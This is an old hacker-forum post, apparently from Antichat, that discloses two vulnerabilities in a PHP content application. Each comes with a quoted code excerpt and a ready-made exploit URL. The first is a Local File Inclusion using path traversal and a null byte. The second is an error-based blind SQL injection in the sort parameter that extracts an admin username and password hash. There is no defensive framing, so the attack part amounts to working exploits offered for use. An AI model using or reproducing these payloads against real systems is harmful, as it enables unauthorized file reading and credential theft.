20.03.2010, 15:41
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Local File Inclusion
Vuln file: /index.php
Код:
file:/includes/php/first.php
/*...*/
//Get Current Page
if(!empty($_GET['p'])){
$core['page'] = strtolower($_GET['p']);
}
if(!empty($_GET['pt'])){
$core['page_type'] = strtolower($_GET['pt']);
}
/*...*/
if($core['page_type'] == "core"){
$page_string = "includes/pages/".$core['page'].".php";
if(file_exists($page_string)){
include($page_string);
$page_found = true;
}
}
/*...*/
Need: magic_quotes = off
Exploit:
Код:
http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00
Blind SQL injection
Vuln file: /includes/pages/users_data.php
Код:
/*...*/
$page = $_GET['page']; //Requested page
$limit = $_GET['rows']; //Num of rows
$sidx = $_GET['sidx']; //Sort by
$sord = $_GET['sord']; //Sort order
/*...*/
$SQL = "SELECT * FROM ".$core['table_prefix']."users";
/*...*/
if(!empty($sidx)){
$SQL .= " ORDER BY ".$sidx." ".$sord;
}
/*...*/
Exploit:
Код:
http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x)
__________________
Avant que l'ombre...
|
|
|